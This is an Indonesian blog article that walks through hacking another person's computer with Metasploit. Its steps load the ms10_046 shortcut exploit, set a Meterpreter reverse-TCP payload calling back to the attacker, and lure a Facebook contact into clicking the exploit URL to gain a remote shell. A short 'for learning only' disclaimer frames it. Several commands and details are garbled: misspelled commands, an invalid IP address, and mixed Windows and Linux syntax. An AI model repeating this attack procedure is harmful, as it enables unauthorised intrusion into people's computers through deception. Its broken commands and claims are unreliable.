Cara Hack Komputer Orang Lain lewat CMD 2024

Cara Hack Komputer Orang Lain lewat CMD
Cara Hack Komputer Orang Lain lewat CMD - Meretas atau menghack merupakan salah satu tindakan yang dilarang dan dibenci oleh sebagian orang.

Walaupun ada tindakan menghack yang diperbolehkan, akan tetapi tetap saja tindakan hack ini sangat ditakuti lho.

Dimana ada banyak hal yang dapat dihack didunia ini, seperti berbagai macam aplikasi mulai dari sosmed chatting dan yang lainnya.

Selain aplikasi, tindakan hack ini juga dapat dilakukan di HP baik itu yng canggih ataupun yang jadul dan lainnya.


Pembahasan Cara Hack Komputer Orang Lain lewat CMD

Perlu anda ketahui, bahwa ada juga orang yang menyukai hal hack komputer seperti mengendalikan komputer orang lain dari jarak jauh lewat CMD karena pada dasarnya mempunyai berbagai manfaat yang banyak tidak diketahui.

Cara menyadap komputer atau Laptop orang lain ini dapat menggunakan CMD dengan memakai terminal di Linux yang menurut kami jauh lebih kompleks dari segi tools hacking.

Yang mana cara hack komputer dengan CMD atau terminal dilinux ini sudah dikenal di masyarakat hacker, karena backtrack mempunyai kelebihan yang sangat di akui para pengguna Android.

Backtrack sendiri mempunyai berbagai versi mulai dari 1, 2, 3, 4, 5 dan seterusnya. Selain itu, ada turunan dari kernel nacktrack yang dapat anda gunakan karena mempunyai tool yang sama lengkapnya seperti Backbox, kali Linux dan lain sebagainya.

Cara hack komputer orang lain lewat CMD dari jarak jauh ini hanya sebagai media pembelajaran dan menambah skill anda.

Nah bagi anda yang ingin mengetahui bagaimana cara melakukannya? Maka silahkan anda simak langsung ulasan yang ada dibawah ini sampai selesai ya.


Cara Hack Komputer Orang Lain lewat CMD


Cara Hack Komputer Orang Lain lewat CMD dari Jarak Jauh

Cara Hack Komputer Orang Lain lewat CMD
Cara Hack Komputer Orang Lain lewat CMD dari Jarak Jauh
Berikut dibawah ini adalah langkah-langkah untuk cara hack komputer orang lain lewat CMD yang dapat anda lakukan dari jarak jauh:

Langkah 1 : Buka Metasploit di CMD atau Terminal Backtrack

  • Pertama-tama yang harus anda lakukan adalah mendownload metasploit melalui link berikut ini (https://www.metasploit.com/).
  • Lalu buka terlebih dahulu CMD atau terminal dan silahkan anda jalankan Metasploit nya.
  • Kemudian silahkan ketikan perintah "cd(letak directory)" misal lokasinya di cd c:\metasploit langsung tekan enter.
  • Setelah itu ketikan perintah selanjutnya sudo chmod +x (nama metesploit).run tekan enter lagi.
  • Nah perintah kode berikutnya adalah sudo ./(nama metasploit).run tekan enter.
  • Dan selanjutnya anda ketik msfconsole, lalu tekan enter.
  • Dimana anda ketikan user exploit/windows/browser/ms10_046_shorcut_icon_dllloader.


Langkah 2 : Mengetahui Alamat IP Komputer Orang Lain

  • Setelah itu, silahkan anda ketik ifoncfig dan anda akan melihat alamat IP anda.
  • Lalu ketikan set srvhost (Alamat IP anda) tekan enter dan set lhost alamat IP anda.
  • Selanjutnya ketikan set PAYLOAD windows/meterpreteer/reverse_tcp tekan enter dan untuk mengetahui berhasil atau tidaknya maka anda ketikan show options.
  • Yang mana anda ketikan exploit dan anda akan mendapatkan URL IP, misalnya seperti alamat UR kami http://192.1681.107. Berikutnya kami akan mengirimkan alamat URL tersebut melalui Facebook yang menjadi target kami agar mengklik alamat URL tersebut.
  • Nah anda akan mengetahui korban yang sudah mengklik alamat URL dengan mengetikkan sessions-i dan ketikan lagi sessions-i 1.


Langkah 3 : Cara Masuk ke Komputer Orang Lain dengan CMD atau Terminal

  • Dimana setelah proses pada sessions-i, anda akan melihat komputer mana saja yang sudah mengklik alamat URL IP tersebut dan sekarang kami akan mengeksekusi terget dengan mengetikan shell dan akan akan melihat berbagai directory atau folder pada komputer target anda sysinfo.
  • Selesai.


Akhir Kata

Nah demikianlah itu dia langkah-langkah yang sudah kami bagikan diatas untuk cara meretas atau menghack kompouter orang lain lewat CMD.

Bagaimana sangat mudah bukan untuk anda lakukan dan yang pastinya cara-cara diatas tidak akan menhabiskan begitu banyak waktunya anda.

Silahkan anda bagikan informasi ini ke teman-teman anda jika ini pentig atau bisa juga ke akun media sosial yang anda punya.

Itulah seluruh isi bahasan kami pada artikel kali ini tentang cara hack komputer orang lain lewat CMD. Sekian dan semoga bermanfaat.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel